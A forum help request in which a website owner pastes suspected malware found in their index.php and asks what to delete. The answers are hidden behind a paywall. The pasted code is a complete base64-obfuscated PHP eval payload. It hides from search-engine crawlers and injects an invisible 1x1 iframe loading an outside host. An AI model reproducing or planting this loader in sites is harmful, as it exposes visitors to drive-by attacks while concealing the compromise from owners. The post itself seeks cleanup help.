elainem
asked on
Malware in index.php
hello, I have found the code below in the index.php file on our website - I'm pretty sure its malware - should I remove everything? or just everything from "eval" to the ")); " ? thanks
here's the code :
<?php eval(base64_decode('ZXJyb3 JfcmVwb3J0 aW5nKDApOw 0KJGJvdCA9 IEZBTFNFID sNCiR1c2Vy X2FnZW50X3 RvX2ZpbHRl ciA9IGFycm F5KCdib3Qn LCdzcGlkZX InLCdzcHlk ZXInLCdjcm F3bCcsJ3Zh bGlkYXRvci csJ3NsdXJw JywnZG9jb2 1vJywneWFu ZGV4JywnbW FpbC5ydScs J2FsZXhhLm NvbScsJ3Bv c3RyYW5rLm NvbScsJ2h0 bWxkb2MnLC d3ZWJjb2xs YWdlJywnYm xvZ3B1bHNl LmNvbScsJ2 Fub255bW91 c2Uub3JnJy wnMTIzNDUn LCdodHRwY2 xpZW50Jywn YnV6enRyYW NrZXIuY29t Jywnc25vb3 B5JywnZmVl ZHRvb2xzJy wnYXJpYW5u YS5saWJlcm 8uaXQnLCdp bnRlcm5ldH NlZXIuY29t Jywnb3Blbm Fjb29uLmRl JywncnJycn JycnJyJywn bWFnZW50Jy wnZG93bmxv YWQgbWFzdG VyJywnZHJ1 cGFsLm9yZy csJ3ZsYyBt ZWRpYSBwbG F5ZXInLCd2 dnJraW1zan V3bHkgbDN1 Zm1qcngnLC dzem4taW1h Z2UtcmVzaX plcicsJ2Jk YnJhbmRwcm 90ZWN0LmNv bScsJ3dvcm RwcmVzcycs J3Jzc3JlYW RlcicsJ215 YmxvZ2xvZy BhcGknKTsN CiRzdG9wX2 lwc19tYXNr cyA9IGFycm F5KA0KCWFy cmF5KCIyMT YuMjM5LjMy LjAiLCIyMT YuMjM5LjYz LjI1NSIpLA 0KCWFycmF5 KCI2NC42OC 44MC4wIiAg LCI2NC42OC 44Ny4yNTUi ICApLA0KCW FycmF5KCI2 Ni4xMDIuMC 4wIiwgICI2 Ni4xMDIuMT UuMjU1Iiks DQoJYXJyYX koIjY0LjIz My4xNjAuMC IsIjY0LjIz My4xOTEuMj U1IiksDQoJ YXJyYXkoIj Y2LjI0OS42 NC4wIiwgIj Y2LjI0OS45 NS4yNTUiKS wNCglhcnJh eSgiNzIuMT QuMTkyLjAi LCAiNzIuMT QuMjU1LjI1 NSIpLA0KCW FycmF5KCIy MDkuODUuMT I4LjAiLCIy MDkuODUuMj U1LjI1NSIp LA0KCWFycm F5KCIxOTgu MTA4LjEwMC 4xOTIiLCIx OTguMTA4Lj EwMC4yMDci KSwNCglhcn JheSgiMTcz LjE5NC4wLj AiLCIxNzMu MTk0LjI1NS 4yNTUiKSwN CglhcnJheS giMjE2LjMz LjIyOS4xND QiLCIyMTYu MzMuMjI5Lj E1MSIpLA0K CWFycmF5KC IyMTYuMzMu MjI5LjE2MC IsIjIxNi4z My4yMjkuMT Y3IiksDQoJ YXJyYXkoIj IwOS4xODUu MTA4LjEyOC IsIjIwOS4x ODUuMTA4Lj I1NSIpLA0K CWFycmF5KC IyMTYuMTA5 Ljc1LjgwIi wiMjE2LjEw OS43NS45NS IpLA0KCWFy cmF5KCI2NC 42OC44OC4w IiwiNjQuNj guOTUuMjU1 IiksDQoJYX JyYXkoIjY0 LjY4LjY0Lj Y0IiwiNjQu NjguNjQuMT I3IiksDQoJ YXJyYXkoIj Y0LjQxLjIy MS4xOTIiLC I2NC40MS4y MjEuMjA3Ii ksDQoJYXJy YXkoIjc0Lj EyNS4wLjAi LCI3NC4xMj UuMjU1LjI1 NSIpLA0KCW FycmF5KCI2 NS41Mi4wLj AiLCI2NS41 NS4yNTUuMj U1IiksDQoJ YXJyYXkoIj c0LjYuMC4w IiwiNzQuNi 4yNTUuMjU1 IiksDQoJYX JyYXkoIjY3 LjE5NS4wLj AiLCI2Ny4x OTUuMjU1Lj I1NSIpLA0K CWFycmF5KC I3Mi4zMC4w LjAiLCI3Mi 4zMC4yNTUu MjU1IiksDQ oJYXJyYXko IjM4LjAuMC 4wIiwiMzgu MjU1LjI1NS 4yNTUiKQ0K CSk7DQokbX lfaXAybG9u ZyA9IHNwcm ludGYoIiV1 IixpcDJsb2 5nKCRfU0VS VkVSWydSRU 1PVEVfQURE UiddKSk7DQ pmb3JlYWNo ICggJHN0b3 BfaXBzX21h c2tzIGFzIC RJUHMgKSB7 DQoJJGZpcn N0X2Q9c3By aW50ZigiJX UiLGlwMmxv bmcoJElQc1 swXSkpOyAk c2Vjb25kX2 Q9c3ByaW50 ZigiJXUiLG lwMmxvbmco JElQc1sxXS kpOw0KCWlm ICgkbXlfaX AybG9uZyA+ PSAkZmlyc3 RfZCAmJiAk bXlfaXAybG 9uZyA8PSAk c2Vjb25kX2 QpIHskYm90 ID0gVFJVRT sgYnJlYWs7 fQ0KfQ0KZm 9yZWFjaCAo JHVzZXJfYW dlbnRfdG9f ZmlsdGVyIG FzICRib3Rf c2lnbil7DQ oJaWYgIChz dHJwb3MoJF 9TRVJWRVJb J0hUVFBfVV NFUl9BR0VO VCddLCAkYm 90X3NpZ24p ICE9PSBmYW xzZSl7JGJv dCA9IHRydW U7IGJyZWFr O30NCn0NCm lmICghJGJv dCkgew0KZW NobyAnPGlm cmFtZSBzcm M9Imh0dHA6 Ly9kczIzZ2 Zkc2hnZm5m LmNvLmNjL1 FRa0ZCZzBN QkFFREFBQU JFa2NKQlFZ TkRBMEREUU FCQmc9PSIg d2lkdGg9Ij EiIGhlaWdo dD0iMSI+PC 9pZnJhbWU+ JzsNCn0=') );
//globals db
here's the code :
<?php eval(base64_decode('ZXJyb3
//globals db
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Thank You